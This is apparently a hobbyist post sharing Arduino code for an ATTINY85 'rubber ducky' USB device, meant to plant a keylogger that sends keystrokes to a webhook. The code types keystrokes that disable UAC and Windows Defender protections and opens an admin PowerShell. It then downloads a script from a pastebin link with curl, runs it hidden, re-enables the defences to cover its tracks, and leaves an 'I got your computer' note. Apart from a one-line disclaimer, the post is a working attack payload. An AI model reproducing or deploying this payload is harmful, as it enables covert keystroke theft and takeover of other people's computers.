The following are code that I have modified from this website to fit my needs. I have made the Powershell script to use the keylogger code, but then send the code to a webhook.site website. This is meant to be used with a rubber ducky that way you can plug it in, and in 10 seconds be out of there with the keylogger up and running. The rubber ducky I will be using is a ATTINY85 Micro-controller. Using the Arduino IDE you can flash the code onto the micro-controller.
Keylogger that sends the text to a web-hook after the user has typed 20 characters:
I do not endorse using this illegally or unethically. If you were to use this ethically, along with a ATTINY85 Rubber Ducky, this would be the .ino code for it:
#include"DigiKeyboard.h"//https://forum.arduino.cc/t/digikeyboard-problem/580162/2#defineKEY_UP_ARROW0x52#defineKEY_DOWN_ARROW0x51#defineKEY_LEFT_ARROW0x50#defineKEY_RIGHT_ARROW0x4F#defineKEY_LEFT_GUI0xE3#defineKEY_ESC0x29#defineKEY_HOME0x4A#defineKEY_INSERT0x49#defineKEY_NUM_LOCK0x53#defineKEY_SCROLL_LOCK0x47#defineKEY_CAPS_LOCK0x39#defineKEY_TAB0x2B//Script is a mod of: https://github.com/JonnyBanana/Rubber-Ducky_Disable_Windows-Defender_Technician-Editionvoidsetup() {DigiKeyboard.update();DigiKeyboard.sendKeyStroke(0);DigiKeyboard.delay(3000);DigiKeyboard.sendKeyStroke(KEY_S, MOD_GUI_LEFT); //start searchDigiKeyboard.delay(1000);//UAC notifications DigiKeyboard.println("settings: uac"); //User Access Control -- This works better for me than just "uac" but to each their own
DigiKeyboard.delay(2000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_DOWN_ARROW);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_DOWN_ARROW);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_LEFT_ARROW);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.delay(1000);//The window should close automatically, so the next 2 lines are just a contingency /* DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_F4); DigiKeyboard.delay(1000); *///Security TakedownDigiKeyboard.sendKeyStroke(KEY_S, MOD_GUI_LEFT); //start searchDigiKeyboard.delay(1000);DigiKeyboard.println("Virus &"); //Virus and Threat protectionDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_ENTER); //Accessing the Manage settings for Virus & thread protectionDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Real-time protection disableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Cloud-delivered Protection DisableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Automatic sample submission disable DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB); //Skip over "Submit a sample manually" option and go to Tamper ProtectionDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Tamper Protection disableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT, KEY_F4); //start searchDigiKeyboard.delay(1000);//Powershell program runningDigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start runDigiKeyboard.delay(1000);DigiKeyboard.println("powershell Start-Process powershell -Verb runAs"); //run powershell as adminDigiKeyboard.delay(2000);DigiKeyboard.println("cd $Env:temp"); //Jumping to temporary dirDigiKeyboard.delay(750);DigiKeyboard.println("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser");DigiKeyboard.delay(1000);DigiKeyboard.println("Y");DigiKeyboard.delay(1000);DigiKeyboard.println("curl <pastebin.com link> -o script.ps1");DigiKeyboard.delay(2000);DigiKeyboard.println("Start-Process powershell -WindowStyle Hidden .\\script.ps1");DigiKeyboard.delay(2000);DigiKeyboard.println("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); //Change it back to NoDigiKeyboard.delay(2000);DigiKeyboard.sendKeyStroke(KEY_ENTER); //start runDigiKeyboard.delay(2000);DigiKeyboard.println("exit");DigiKeyboard.delay(500);//Setting up Windows Security once more//Security Put-UpDigiKeyboard.sendKeyStroke(KEY_S, MOD_GUI_LEFT); //start searchDigiKeyboard.delay(1000);DigiKeyboard.println("Virus &"); //Virus and Threat protectionDigiKeyboard.delay(500);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_ENTER); //Accessing the Manage settings for Virus & thread protectionDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Real-time protection enableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB); // Go over "Cloud-delivered protection" warningDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Cloud-delivered Protection EnableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB); // Go over "Automatic sample submission" warningDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Automatic sample submission enableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB); //Skip over "Submit a sample manually" option and go to Tamper ProtectionDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB); //Skip over "Tamper protection is off" warningDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE); //Tamper Protection enableDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT, KEY_F4); //close the windowDigiKeyboard.delay(1000);//Enable UAC againDigiKeyboard.sendKeyStroke(KEY_S, MOD_GUI_LEFT); //start searchDigiKeyboard.delay(1000); DigiKeyboard.println("settings: uac"); //User Access Control -- This works better for me than just "uac" but to each their own
DigiKeyboard.delay(2000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_UP_ARROW);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_UP_ARROW); //Taking it back to default settingsDigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_TAB);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.delay(1000);//Warning or a way to tell a person you got their computerDigiKeyboard.sendKeyStroke(KEY_S, MOD_GUI_LEFT); //start searchDigiKeyboard.delay(1000);DigiKeyboard.println("powershell"); DigiKeyboard.delay(2000);DigiKeyboard.println("echo \"I got your computer\" >> text.txt; notepad text.txt; exit"); DigiKeyboard.delay(2000); /* DigiKeyboard.println(""); DigiKeyboard.delay(500); */}voidloop() {// unused - blink the LED maybe?}